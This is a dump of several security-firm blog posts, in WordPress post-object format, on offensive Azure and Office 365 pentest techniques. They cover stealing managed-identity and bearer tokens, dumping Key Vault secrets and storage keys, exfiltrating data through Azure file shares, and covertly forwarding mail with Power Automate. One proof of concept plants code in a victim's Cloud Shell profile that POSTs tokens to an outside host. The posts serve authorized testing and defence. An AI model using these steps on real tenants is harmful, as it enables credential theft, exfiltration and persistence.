                        print (str(row[0]))
                        row = cursor.fetchone()

root@567327e35d3c:/home# python sqlQuery.py
Microsoft SQL Azure (RTM) - 12.0.2000.8
        Jul 31 2020 08:26:29
        Copyright (C) 2019 Microsoft Corporation

Your best bet for deploying this script to the host is probably downloading it from a remote source. Trying to manually edit Python from the Azure web based SSH connection is not going to be a fun time.

More generally, trying to do much of anything in these Linux hosts may be tricky. For this blog, I was working in a sample app that I spun up for myself and immediately ran into multiple issues, so your mileage may vary here.

For more information about using Python with Azure SQL, check out Microsoft's documentation.

Abusing Managed Identities to Get Tokens

An application/VM/etc. can be configured with a Managed Identity that is given rights to specific resources in the subscription via IAM policies. This is a handy way of granting access to resources, but it can be used for lateral movement and privilege escalation.

We've previously covered Managed Identities for VMs on the Azure Privilege Escalation Using Managed Identities blog post. If the application is configured with a Managed Identity, you may be able to use the privileges of that identity to pivot to other resources in the subscription and potentially escalate privileges in the subscription/tenant.

In the next section, we'll cover getting tokens for a Managed Identity that can be used with the management.azure.com REST APIs to determine the resources that your identity has access to.

Getting Tokens

There are two different ways to get tokens out of your App Services application. Each of these depend on different versions of the REST API, so depending on the environmental variables that you have at your disposal, you may need to choose one or the other.

*Note that if you're following along in the Console, the Windows commands will require writing that token to a file first, as Curl doesn't play nice with the Console output.

Windows:

  • MSI Secret Option:
curl "%MSI_ENDPOINT%?resource=https://management.azure.com&api-version=2017-09-01" -H secret:%MSI_SECRET% -o token.txt
type token.txt
  • X-IDENTITY-HEADER Option:
curl "%IDENTITY_ENDPOINT%?resource=https://management.azure.com&api-version=2019-08-01" -H X-IDENTITY-HEADER:%IDENTITY_HEADER% -o token.txt
type token.txt

Linux:

  • MSI Secret Option:
curl "$MSI_ENDPOINT?resource=https://management.azure.com&api-version=2017-09-01" -H secret:$MSI_SECRET
  • X-IDENTITY-HEADER Option:
curl "$IDENTITY_ENDPOINT?resource=https://management.azure.com&api-version=2019-08-01" -H X-IDENTITY-HEADER:$IDENTITY_HEADER

For additional reference material on this process, check out the Microsoft documentation.

These tokens can now be used with the REST APIs to gather more information about the subscription. We could do an entire post covering all of the different ways you can gather data with these tokens, but here's a few key areas to focus on.

Accessing Key Vaults with Tokens

Using a Managed Identity token, you may be able to pivot over to any Key Vaults that the identity has access to. In order to retrieve these Key Vault values, we will need a token that's scoped to vault.azure.net. To get this vault token, use the previous process, and change the "resource" URL to https://vault.azure.net.

I would recommend setting two tokens as variables in PowerShell on your own system (outside of App Services):

$mgmtToken = "eyJ0eXAiOiJKV1QiLCJhbGciOiJSU…"
$kvToken = "eyJ0eXAiOiJKV1QiLCJhbGciOiJSU…"

And then pass those two variables into the following MicroBurst functions:

Get-AzKeyVaultKeysREST -managementToken $mgmtToken -vaultToken $kvToken -Verbose
Get-AzKeyVaultSecretsREST -managementToken $mgmtToken -vaultToken $kvToken -Verbose

These functions will poll the subscription for any available Key Vaults, and attempt to read keys/secrets out of the vaults. In the example below, our Managed Identity only had access to one vault (netspi-private) and one secret (TestKey) in that vault.

Keyvault

Accessing Storage Accounts with Tokens

Outside of any existing storage accounts that may be configured in the app (See Above), there may be additional storage accounts that the Managed Identity has access to.

Use the Get-AZStorageKeysREST function within MicroBurst to dump out any additional available storage keys that the identity may have access to. This was previously covered in the Gathering Bearer Tokens from Azure Services blog, but you will want to use a token scope to management.azure.com with this function.

Get-AZStorageKeysREST -token YOUR_TOKEN_HERE

As previously mentioned, we could do a whole series on the different ways that we could use these Managed Identity tokens, so keep an eye out for future posts here.

Conclusion

Got a shell on an Azure App Services host? Don't assume that the cloud has (yet again) solved all the security problems in the world. There are plenty of options to potentially pivot from the App Services host, and hopefully you can use one of them from here.

From a defender's perspective, I have a couple of recommendations:

  • Test your web applications regularly
  • Utilize the Azure Web Application Firewalls (WAF) to help with coverage
  • Configure your Managed Identities with least privilege
    • Consider architecture that allows other identities in the subscription to do the heavy lifting
    • Don't give subscription-wide permissions to Managed Identities

Prior Work

I've been working on putting this together for a while, but during that time David Okeyode put out a recording of a presentation he did for the Virtual Azure Community Day that pretty closely follows these attack paths. Check out David's video for a great walkthrough of a real life scenario.

For other interesting work on Azure tokens, Tenant enumeration, and Azure AD, check out Dirk-jan Mollema's work on his blog. - https://dirkjanm.io/

[post_title] => Lateral Movement in Azure App Services [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => lateral-movement-azure-app-services [to_ping] => [pinged] => [post_modified] => 2021-07-30 12:53:27 [post_modified_gmt] => 2021-07-30 17:53:27 [post_content_filtered] => [post_parent] => 0 [guid] => https://blog.netspi.com/?p=11728 [menu_order] => 112 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [4] => WP_Post Object ( [ID] => 11720 [post_author] => 10 [post_date] => 2020-07-29 07:00:30 [post_date_gmt] => 2020-07-29 07:00:30 [post_content] =>

Get-AzPasswords is a function within the MicroBurst toolkit that's used to get passwords from Azure subscriptions using the Az PowerShell modules. As part of this, the function supports gathering passwords and certificates that are attached to automation accounts.

These credentials can be stored in a few different ways:

  • Credentials - Username/Password combinations
  • Connections - Service Principal accounts that you can assume the identity of
  • Certificates - Certs that can be used in the runbooks

If you have the ability to write and run runbooks in an automation account, each of these credentials can be retrieved in a usable format (cleartext or files). All of the stored automation account credentials require runbooks to retrieve, and we really only have one easy option to return the credentials to Get-AzPasswords: print the credentials to the runbook output as part of the extraction script.

The Problem

The primary issue with writing these credentials to the runbook job output is the availability of those credentials to anyone that has rights to read the job output.

Ctcreds

By exporting credentials through the job output, an attacker could unintentionally expose automation account credentials to lesser privileged users, resulting in an opportunity for privilege escalation. As responsible pen testers, we don't want to leave an environment more vulnerable than it was when we started testing, so outputting the credentials to the output logs in cleartext is not acceptable.

The Solution

To work around this issue, we've implemented a certificate-based encryption scheme in the Get-AzPasswords function to encrypt any credentials in the log output.

The automation account portion of the Get-AzPasswords function now uses the following process:

  1. Create a new self-signed certificate (microburst) on the system that is running the function
  2. Export the public certificate to a local file
  3. Encode the certificate file into a base64 string to use in the automation runbook
  4. Decode the base64 bytes to a cer file and import the certificate in the automation account
  5. Use the certificate to encrypt (Protect-CmsMessage) the credential data before it's written to the output
  6. Decrypt (Unprotect-CmsMessage) the output when it's retrieved on the testing system
  7. Remove the self-signed cert and remove the local file from the testing system

This process protects the credentials in the logs and in transit. Since each certificate is generated at runtime, there's less concern of someone decrypting the credential data from the logs after the fact.

The Results

Those same credentials from above will now look like this in the output logs:

Enccreds

On the Get-AzPasswords side of this, you won't see any difference from previous versions. Any credentials gathered from automation accounts will still be available in cleartext in the script output, but now the credentials will be protected in the output logs.

For anyone making use of Get-Azpasswords in MicroBurst, make sure that you grab the latest version from NetSPI's GitHub - https://github.com/NetSPI/MicroBurst

[post_title] => Get-AzPasswords: Encrypting Automation Password Data [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => encrypting-password-data-in-get-azpasswords [to_ping] => [pinged] => [post_modified] => 2021-06-08 22:01:41 [post_modified_gmt] => 2021-06-08 22:01:41 [post_content_filtered] => [post_parent] => 0 [guid] => https://blog.netspi.com/?p=11720 [menu_order] => 119 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [5] => WP_Post Object ( [ID] => 11709 [post_author] => 10 [post_date] => 2020-07-16 07:00:53 [post_date_gmt] => 2020-07-16 07:00:53 [post_content] =>

For many years, pentester-hosted SMB shares have been a common technology to use during internal penetration tests for getting tools over to, and data off of, target systems. The process is simple: share a folder from your testing system, execute a "net use z: testingboxtools" from your target, and run your tools from the share.

For a long time, this could be used to evade host-based protection software. While this is all based on anecdotal evidence… I believe that this was mainly due to the defensive software being cautious with network shares. If AV detects a payload on a shared drive (“Finance”), and quarantines the whole share, that could impact multiple users on the network.

As we’ve all continued to migrate up to the cloud, we’re finding that SMB shares can still be used for testing, and can be augmented using cloud services. As I previously mention on the NetSPI blog, Azure services can be a handy way to bypass outbound domain filters/restrictions during assessments. Microsoft-hosted Azure file shares can be used, just like the previously mentioned on-prem SMB shares, to run tools and exfiltrate data.

Setting Up Azure File Shares

Using Azure storage accounts, it’s simple to set up a file share service. Create a new account in your subscription, or navigate to the Storage Account that you want to use for your testing and click the “+ File Share” tab to create a new file share.

For both the file share and the storage account name, I would recommend using names that attempt to look legitimate. Ultimately the share path may end up in log files, so something along the lines of hackertools.file.core.windows.netpayloads may be a bad choice.

Connecting to Shares

After setting up the share, mapping the drive from a Windows host is pretty simple. You can just copy the PowerShell code directly from the Azure Portal.

Or you can simplify things, and you can remove the connectTestResult commands from the above command:

cmd.exe /C "cmdkey /add:`"STORAGE_ACCT_NAME.file.core.windows.net`" /user:`"AzureSTORAGE_ACCT_NAME`" /pass:`"STORAGE_ACCT_KEY`""
New-PSDrive -Name Z -PSProvider FileSystem -Root "\\STORAGE_ACCT_NAME.file.core.windows.net\tools" | out-null

Where STORAGE_ACCT_NAME is the name of your storage account, and STORAGE_ACCT_KEY is the key used for mapping shares (found under “Access Keys” in the Storage Account menu).

I've found that the connection test code will frequently fail, even if you can map the drive. So there's not a huge benefit in keeping that connection test in the script.

Now that we have our drive mapped, you can run your tools from the drive. Your mileage may vary for different executables, but I’ve recently had luck using this technique as a way of getting tools onto, and data out of, a cloud-hosted system that I had access to.

Removing Shares

As for clean up, we will want to remove the added drive when we are done, and remove any cmdkeys from our target system.

Remove-PSDrive -Name Z
cmd.exe /C "cmdkey /delete:`"STORAGE_ACCT_NAME.file.core.windows.net`""

It also wouldn’t hurt to cycle those keys on our end to prevent the old ones from being used again. This can be done using the blue refresh button from the “Access Keys” section in the portal.

To make this a little more portable for a cloud environment, where we may be executing PowerShell on VMs through cloud functions, we can just do everything in one script:

cmd.exe /C "cmdkey /add:`" STORAGE_ACCT_NAME.file.core.windows.net`" /user:`"Azure STORAGE_ACCT_NAME`" /pass:`" STORAGE_ACCT_KEY`""
New-PSDrive -Name Z -PSProvider FileSystem -Root "\\STORAGE_ACCT_NAME.file.core.windows.net\tools" | out-null

# Insert Your Commands Here

Remove-PSDrive -Name Z
cmd.exe /C "cmdkey /delete:`"STORAGE_ACCT_NAME.file.core.windows.net`""

*You may need to change the mapped PS Drive letter, if it’s already in use.

I was recently able to use this in an AWS environment with the Run Command feature in the AWS Systems Manager service, but this could work anywhere that you have command execution on a host, and want to stay off of the local disk.

Conclusion

The one big caveat for this methodology is the availability of outbound SMB connections. While you may assume that most networks would disallow outbound SMB to the internet, it’s actually pretty rare for us to see outbound restrictions on SMB traffic from cloud provider (AWS, Azure, etc.) networks. Most default cloud network policies allow all outbound ports and protocols to all destinations. So this may get more mileage during your assessments against cloud hosts, but don't be surprised if you can use Azure file shares from an internal network.

[post_title] => Azure File Shares for Pentesters [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => azure-file-shares-for-pentesters [to_ping] => [pinged] => [post_modified] => 2021-07-12 13:18:02 [post_modified_gmt] => 2021-07-12 18:18:02 [post_content_filtered] => [post_parent] => 0 [guid] => https://blog.netspi.com/?p=11709 [menu_order] => 123 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [6] => WP_Post Object ( [ID] => 11569 [post_author] => 10 [post_date] => 2020-06-25 07:00:40 [post_date_gmt] => 2020-06-25 07:00:40 [post_content] =>

During a recent Office 365 assessment, we ran into an interesting situation where Exchange was configured to disallow any external domain forwarding rules. This configuration is intended to prevent attackers from compromising an account and setting up forwarding for remote mail access and persistence. Part of this assessment was to validate that these configurations were properly implemented, and also to look for potential bypasses for this configuration.

Power Automate

As part of the Office 365 environment, we had access to the Power Automate application. Formerly known as Microsoft Flow, Power Automate is a framework for gluing together multiple services for automation tasks within Office 365.

Want to get an email every time someone uploads a file to your shared OneDrive folder? Connect Outlook and OneDrive in Power Automate and set up a flow. I like to think of it as IFTTT for the Microsoft ecosystem.

Forwarding Email

Since we were able to create connections and flows in Power Automate, we decided to connect Power Automate to Office 365 Outlook and create a flow for forwarding email to a NetSPI email address.

You can use the following process to set up external mail forwarding with Power Automate:

1. Under the Data menu, select "Connections".

Connections

2. Select "New Connection" at the top of the window, and find the "Office 365 Outlook" connection.

Newconnection

3. Select "Create" on the connection and authorize the connection under the OAuth pop-up.

4. Navigate to the "Create" section from the left navigation menu, and select "Automated flow".

Start

5. Name the flow (OutlookForward) and search for the "When a new email arrives (V3)" Office 365 Outlook trigger.

Build

6. Select any advanced options and add a new step.

Newstep

7. In the added step, search for the Office 365 Outlook connection, and find the "Forward an email (V2)" action.

Addedstep

8. From the "Add dynamic content" link, find "Message Id" and select it for the Message Id.

Messageid

9. Set your "To" address to the email address that you'd like to forward the message to.

10. Optional, but really recommended - Add one more step "Mark as read or unread (V2)" from the Office 365 Outlook connection, and mark the message as Unread. This will hopefully make the forwarding activity less obvious to the compromised account.

Unread

11. Save the flow and wait for the emails to start coming in.

You can also test the flow in the editor. It should look like this:

Success

Taking it further

While forwarding email to an external account is handy, it may not accomplish the goal that we're going for.

Here are a few more ideas for interesting things that could be done with Power Automate:

  • Use "Office 365 Users - Search for users (V2)" to do domain user enumeration
    • Export the results to an Excel file stored in OneDrive
  • Use the enumerated users list as targets for an email phishing message, sent from the compromised account
    • Watch an inbox for the template message, use the message body as your phishing email
  • Connect "OneDrive for Business" and an external file storage provider (Dropbox/SFTP/Google Drive) to mirror each other
    • When a file is created or modified, copy it to Dropbox
  • Connect Azure AD with an admin account to create a new user
    • Trigger the flow with an email to help with persistence.

Fixing the Issue

It looks like it is possible to disable Power Automate for users, but you may have legitimate reasons for using it. Alternatively, Microsoft Flow audit events are available in the Office365 Security & Compliance center, so you can at least log and alert on the creation of new flow.

For anyone looking to map these activities back to the Mitre ATT&CK framework, check out these links:

Prior Work

Some related prior Microsoft Flow related research was presented at DerbyCon in 2019 by Trent Lo - https://www.youtube.com/watch?v=80xUTJPlhZc

[post_title] => Bypassing External Mail Forwarding Restrictions with Power Automate [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => bypassing-forwarding-restrictions-power-automate [to_ping] => [pinged] => [post_modified] => 2021-06-08 22:00:27 [post_modified_gmt] => 2021-06-08 22:00:27 [post_content_filtered] => [post_parent] => 0 [guid] => https://blog.netspi.com/?p=11569 [menu_order] => 129 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [7] => WP_Post Object ( [ID] => 11564 [post_author] => 10 [post_date] => 2020-05-12 07:00:00 [post_date_gmt] => 2020-05-12 07:00:00 [post_content] =>

Azure Container Registries are Microsoft's solution for managing Docker images in the cloud. The service allows for authentication with AzureAD credentials, or an "Admin user" that shares its name with the registry.

Acrinfo

For the purposes of this blog, let's assume that you've compromised some Admin user credentials for an Azure Container Registry (ACR). These credentials may have been accidentally uploaded to GitHub, found on a Jenkins server, or discovered in any number of random places that you may be able to find credentials.

Alternatively, you may have used the recently updated version of Get-AzPasswords, to dump out ACR admin credentials from an Azure subscription. If you already have rights to do that, you may just want to skip to the end of this post to see the AZ CLI commands that you can use instead.

Acrpass

The credentials will most likely be in a username/password format, with a registry URL attached (EXAMPLEACR.azurecr.io).

Now that you have these credentials, we'll go through next steps that you can take to access the registry and (hopefully) escalate your privileges in the Azure subscription.

Logging In

The login portion of this process is really simple. Enter the username, registry URL, and the password into the following docker command:

docker login -u USER_NAME EXAMPLEACR.azurecr.io

If the credentials are valid, you should get a "Login Succeeded".

Enumerating Container Images and Tags

In order to access the container images, we will need to enumerate the image names and available tags. Normally, I would do this through an authenticated AZ CLI session (see below), but since we only have the ACR credentials, we will have to use the Docker Registry APIs to do this.

For starters we will use the "_catalog" API to list out all of the images for the registry. This needs to be done with authentication, so we will use the ACR credentials in a Basic Authorization (Base64[USER:PASS]) header to request "https://EXAMPLEACR.azurecr.io/v2/_catalog".

Sample PowerShell code:

Basicauth

Now that we have a list of images, we will want to find the current tags for each image. This can be done by making additional API requests to the following URL (where IMAGE_NAME is the one you want the tags for) - https://EXAMPLEACR.azurecr.io/v2/IMAGE_NAME/tags/list

Sample PowerShell code:

Enumtags

To make this whole process easier, I've wrapped the above code into a PowerShell function (Get-AzACR) in MicroBurst to help.

PS C:> Get-AzACR -username EXAMPLEACR -password A_$uper_g00D_P@ssW0rd -registry EXAMPLEACR.azurecr.io
docker pull EXAMPLEACR.azurecr.io/arepository:4
docker pull EXAMPLEACR.azurecr.io/dockercore:1234
docker pull EXAMPLEACR.azurecr.io/devabcdefg:2020
docker pull EXAMPLEACR.azurecr.io/devhijklmn:4321
docker pull EXAMPLEACR.azurecr.io/imagetester:10
docker pull EXAMPLEACR.azurecr.io/qatestimage:1023
...

As you can see above, this script will output the docker commands that can run to "pull" each image (with the first available tag).

Important note: the first tag returned by the APIs may not be the latest tag for the image. The API is not great about returning metadata for the tags, so it's a bit of a guessing game for which tag is the most current. If you want to see all tags for all images, just use the -all flag on the script.

Append the output of the script to a .ps1 file and run it to pull all of the container images to your testing system (watch your disk space). Alternatively, you can just pick and choose the images that you want to look at one at a time:

PS C:> docker pull EXAMPLEACR.azurecr.io/dockercore:1234
1234: Pulling from dockercore
[Truncated]
6638d86fd3ee: Download complete
6638d86fd3ee: Pull complete
Digest: sha256:2c[Truncated]73
Status: Downloaded image for EXAMPLEACR.azurecr.io/dockercore:1234
EXAMPLEACR.azurecr.io/dockercore:1234

Fun fact - This script should also work with regular docker registries. I haven't had a non-Azure registry to try this against yet, but I wouldn't be surprised if this worked against a standard Docker registry server.

Running Docker Containers

Once we have the container images on our testing system, we will want to run them.

Here's an example command for running a container from the dockercore image with an interactive entrypoint of "/bin/bash":

docker run -it --entrypoint /bin/bash EXAMPLEACR.azurecr.io/dockercore:1234

*This example assumes bash is an available binary in the container, bash may not always be available for you

With access to the container, we can start looking at any local files, and potentially find secrets in the container.

Real World Example

For those wondering how this could be practical in the real world, here's an example from a recent Azure cloud pen test.

  1. Azure Storage Account exposed a Terraform script containing ACR credentials
  2. NetSPI connected to the ACR with Docker
  3. Listed out the images and tags with the above process
  4. NetSPI used Docker to pull images from the registry
  5. Ran bash shells on each image and reviewed available files
  6. Identified Azure storage keys, Key Vault keys, and Service Principal credentials for the subscription

TL;DR - Anonymous access to ACR credentials resulted in Service Principal credentials for the subscription

Using the AZ CLI

If you already happen to have access to an Azure subscription where you have ACR reader (or subscription reader) rights on a container registry, the AZ CLI is your best bet for enumerating images and tags.

From an authenticated AZ CLI session, you can list the registries in the subscription:

PS C:> az acr list
[
{
"adminUserEnabled": true,
"creationDate": "2019-09-17T20:42:28.689397+00:00",
"id": "/subscriptions/d4[Truncated]b2/resourceGroups/ACRtest/providers/Microsoft.ContainerRegistry/registries/netspiACR",
"location": "centralus",
"loginServer": "netspiACR.azurecr.io",
"name": "netspiACR",
[Truncated]
"type": "Microsoft.ContainerRegistry/registries"
}
]

Select the registry that you want to attack (netspiACR) and use the following command to list out the images:

PS C:> az acr repository list --name netspiACR
[
"ACRtestImage"
]

List tags for a container image (ACRtestImage):

PS C:> az acr repository show-tags --name netspiACR --repository ACRtestImage
[
"latest"
]

Authenticate with Docker

PS C:> az acr login --name netspiACR
Login Succeeded

Once you are authenticated, have the container image name and tag, the "docker pull" process will be the same as above.

Conclusion

Azure Container Registries are a great way to manage Docker images for your Azure infrastructure, but be careful with the credentials. Additionally, if you are using a premium SKU for your registry, restrict the access for the ACR to specific networks. This will help reduce the availability of the ACR in the event of the credentials being compromised. Finally, watch out for Reader rights on Azure Container Registries. Readers have rights to list and pull any images in a registry, so they may have more access than you expected.

[post_title] => Attacking Azure Container Registries with Compromised Credentials [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => attacking-acrs-with-compromised-credentials [to_ping] => [pinged] => [post_modified] => 2021-06-08 22:00:23 [post_modified_gmt] => 2021-06-08 22:00:23 [post_content_filtered] => [post_parent] => 0 [guid] => https://blog.netspi.com/?p=11564 [menu_order] => 144 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [8] => WP_Post Object ( [ID] => 18419 [post_author] => 2 [post_date] => 2020-04-16 15:47:52 [post_date_gmt] => 2020-04-16 20:47:52 [post_content] =>

As organizations continue to move to the cloud for hosting applications and development, security teams must protect multiple attack surfaces, including the applications and cloud infrastructure. Additionally, attackers are automated and capable. While these attackers continuously probe and find access or vulnerabilities on many different levels, their success usually results from human error in code or infrastructure configurations, such as open admin ports and over privileged identity roles.

During this co-sponsored webinar, you will learn how to better secure both the application layer and cloud infrastructure, using both automated tools and capable penetration testers to uncover logic flaws and other soft spots. NetSPI and DisruptOps will share how to find and remediate your own vulnerabilities more efficiently, before the attackers do.

[post_title] => Securing The Cloud: Top Down and Bottom Up [post_excerpt] => As organizations continue to move to the cloud for hosting applications and development, security teams must protect multiple attack surfaces, including the applications and cloud infrastructure. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => securing-the-cloud-top-down-and-bottom-up [to_ping] => [pinged] => [post_modified] => 2021-06-02 08:57:27 [post_modified_gmt] => 2021-06-02 08:57:27 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?post_type=webinars&p=18419 [menu_order] => 38 [post_type] => webinars [post_mime_type] => [comment_count] => 0 [filter] => raw ) [9] => WP_Post Object ( [ID] => 11373 [post_author] => 10 [post_date] => 2020-04-16 07:00:44 [post_date_gmt] => 2020-04-16 07:00:44 [post_content] => In the previous Azure Managed Identities blog, we covered some simple proof of concept examples for using Azure Virtual Machine Managed Identities to escalate privileges in an Azure subscription. The example code relied on Azure OAuth bearer tokens that were generated from authenticating to the Azure metadata service. Since posting that blog, we've found a handful of other places in Azure that generate similar types of bearer tokens that can used with the publicly available REST APIs during pen tests. In this follow up post, we will cover how to collect bearer tokens from additional services and introduce a new scripts section in MicroBurst that can be used with these tokens to gather Azure information, and/or escalate privileges in an Azure subscription.

A Primer on Bearer Tokens

Azure Bearer tokens are the core of authentication/authorization for the Azure APIs. The tokens can be generated from a number of different places, and have a variety of uses, but they are a portable token that can be used for accessing Azure REST APIs. The token is in a JWT format that should give you a little more insight about the user it's issued to, once you pull apart the JWT. For the purposes of this blog, we won't be going into the direct authentication (OAuth/SAML) to login.microsoftonline.com. The examples here will be tied to gathering tokens from existing authenticated sessions or Azure services. For more information on the Microsoft authentication model, here's Microsoft's documentation. An important thing to note here is the scope of the token. If you only request access to https://management.azure.com/, that's all that your token will have access to. If you want access to other services (https://vault.azure.net/) you should request that in the "scope" (or resource) section of the initial request. In some cases, you may need to request multiple tokens to cover the services you're trying to access. There are "refresh" tokens that are normally used for extending scope for other services, but those won't be available in all of our examples below. For the sake of simplicity, each example listed below is scoped to management.azure.com. For more information on the token structure, please consult the Microsoft documentation.

Gathering Tokens

Below is an overview of the different services that we will be gathering bearer tokens from in this blog:

Azure Portal

We'll start things off with an easy token to help explain what these bearer tokens look like. Login to the Azure portal with a proxy enabled, and observe the Bearer token in the Authorization header: Bearer From a pen tester's perspective, you may be able to intercept a user's web traffic in order to get access to this token. This token can then be copied off to be used in other tools/scripts that need to make requests to the management APIs.

Azure CLI Files

The Azure CLI also uses bearer tokens and stores them in the "c:\Users\%USERNAME%\.azure\accessTokens.json" file. These tokens can be directly copied out of the file and used with the management REST APIs, or if you want to use the AZ CLI on your own system with "borrowed" tokens, you can just replace the contents of the file on your own system to assume those tokens. If you're just looking for a quick way to grab tokens from your currently logged in user, here's some basic PowerShell that will help:
gc c:\Users\$env:USERNAME\.azure\accessTokens.json | ConvertFrom-Json
These tokens are scoped to the management.core.windows.net resource, but there should be a refresh token that you can use to request additional tokens. Chris Maddalena from SpecterOps has a great post that helps outline this (and other Azure tips). Lee Kagan and RJ McDown from Lares also put out a series that covers some similar concepts (relating to capturing local Azure credentials) as well (Part 1) (Part 2).

Virtual Machine Managed Identities

In the previous blog, we covered Virtual Machine Managed Identities and gave two proof of concept examples (escalate to Owner, and list storage account keys). You can see the previous blog to get a full overview, but in general, you can authenticate to the VM Metadata service (different from login.microsoftonline.com) as the Virtual Machine, and use the tokens with the REST APIs to take actions. Id E From a Managed Identity VM, you can execute the following PowerShell commands to get a bearer token:
$response = Invoke-WebRequest -Uri 'http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/' -Method GET -Headers @{Metadata="true"} -UseBasicParsing
$content = $response.Content | ConvertFrom-Json
$ArmToken = $content.access_token
One of the key things to note here is the fact that the Azure metadata service that we authenticate to requires specific headers to be present when making requests for credentials. This helps reduce the potential impact of a Server-Side Request Forgery (SSRF) attack.

Automation Account "RunAs" Accounts

In order to generate a token from an existing Runbook/Automation Account RunAs account, you will need to create a new (or modify an existing) runbook that authenticates the RunAs account, and then access the token with the runbook code. You can use the following code to accomplish this:
# Get Azure Run As Connection Name
$connectionName = "AzureRunAsConnection"

# Get the Service Principal connection details for the Connection name
$servicePrincipalConnection = Get-AutomationConnection -Name $connectionName

# Logging in to Azure AD with Service Principal
"Logging in to Azure AD..."
$azcontext = Connect-AzureRMAccount -TenantId $servicePrincipalConnection.TenantId `
-ApplicationId $servicePrincipalConnection.ApplicationId `
-CertificateThumbprint $servicePrincipalConnection.CertificateThumbprint

# https://gallery.technet.microsoft.com/scriptcenter/Easily-obtain-AccessToken-3ba6e593
$azureRmProfile = [Microsoft.Azure.Commands.Common.Authentication.Abstractions.AzureRmProfileProvider]::Instance.Profile
$azureRmProfile
$currentAzureContext = Get-AzureRmContext
$profileClient = New-Object Microsoft.Azure.Commands.ResourceManager.Common.RMProfileClient($azureRmProfile)

$token = $profileClient.AcquireAccessToken($currentAzureContext.Tenant.TenantId)
$token | convertto-json
$token.AccessToken
Keep in mind that this token will be for the Automation Account "RunAs" account, so you will most likely have subscription contributor rights with this token. Added bonus here: if you'd like to stay under the radar, create a new runbook or modify an existing runbook, and use the "Test Pane" to run the code. This will keep the test run from showing up in the jobs logs, and you can still access the token in the output. This heavily redacted screenshot will show you how the output should look. Bearer This code can also be easily modified to post the token data off to a web server that you control (see the next section). This would be helpful if you're looking for a more persistent way to generate these tokens. If you're going that route, you could also set the runbook to run on a schedule, or potentially have it triggered by a webhook. See the previous Automation Account persistence blog for more information on that.

Cloud Shell

The Azure Cloud shell has two ways that it can operate (Bash or PowerShell), but thankfully the same method can be used by both to get a bearer token for a user.
curl http://localhost:50342/oauth2/token --data "resource=https://management.azure.com/" -H Metadata:true -s
Bearer I wasn't able to find exact specifics around the source of this localhost service, but given the Cloud Shell architecture, I'm assuming that this "localhost:50342" service is just used to help authenticate Cloud Shell users for existing tools, like the AZ CLI, in the shell. From a pen tester's perspective, it would be most practical to modify a Cloud Shell home directory (See Previous Blog) for another (more privileged) user to capture this token and send it off to a server that you control. This is particularly impactful if your victim Cloud Shell has higher privileges than your current user. By appending the following lines of PowerShell to the profile file, you can have cloud shell quietly send off a new bearer token as a POST request to a web server that you control (example.com). Proof of Concept Code:
$token = (curl http://localhost:50342/oauth2/token --data "resource=https://management.azure.com/" -H Metadata:true -s)
Invoke-WebRequest 'example.com' -Body $token -Method 'POST' | out-null
*For this example, I just set up a Burp Collaborator host (example.com) to post this token to Given that this bearer token doesn't carry a refresh token, you may want to modify the PoC code above to request tokens for multiple resources.

Using the Tokens

Now that we have a token, we will want to make use of it. As a simple proof of concept, we can use the Get-AZStorageKeysREST function in MicroBurst, with a management.azure.com scoped bearer token, to list out any available storage account keys.
Get-AZStorageKeysREST -token YOUR_TOKEN_HERE
This will prompt you for the subscription that you want to use, but you can also specify the desired subscription with the -subscriptionId flag. Stay tuned to the NetSPI blog for future posts, where we will cover how to make use of these tokens with the Azure Rest APIs to do information gathering, privilege escalation, and credential gathering with the Azure APIs and bearer tokens. The initial (and future) scripts will be in the REST folder of the MicroBurst repo:

Conclusion

While this isn't an exhaustive list, there are lots of ways to get bearer tokens in Azure, and while they may have limited permissions (depending on the source), they can be handy for information gathering, persistence, and/or privilege escalation in certain situations. Feel free to let me know if you've had a chance to make use of Azure Bearer tokens down in the comments, or out in the MicroBurst GitHub repository. [post_title] => Gathering Bearer Tokens from Azure Services [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => gathering-bearer-tokens-azure [to_ping] => [pinged] => [post_modified] => 2021-06-11 15:19:21 [post_modified_gmt] => 2021-06-11 15:19:21 [post_content_filtered] => [post_parent] => 0 [guid] => https://blog.netspi.com/?p=11373 [menu_order] => 152 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [10] => WP_Post Object ( [ID] => 19769 [post_author] => 2 [post_date] => 2020-03-04 10:41:04 [post_date_gmt] => 2020-03-04 10:41:04 [post_content] =>

Watch the first webinar in our Lunch & Learn Series below!

With the increase in hybrid cloud adoption, that extends traditional active directory domain environments into Azure, penetration tests and red team assessments are more frequently bringing Azure tenants into the engagement scope. Attackers are often finding themselves with an initial foothold in Azure, but lacking in ideas on what an escalation path would look like.

In this webinar, Karl Fosaaen covers some of the common initial Azure access vectors, along with a handful of escalation paths for getting full control over an Azure tenant. In addition to this, he covers some techniques for maintaining that privileged access after an initial escalation. Throughout each section, he shares some of the tools that can be used to help identify and exploit the issues outlined.

https://youtu.be/zzP3HSWyu4M
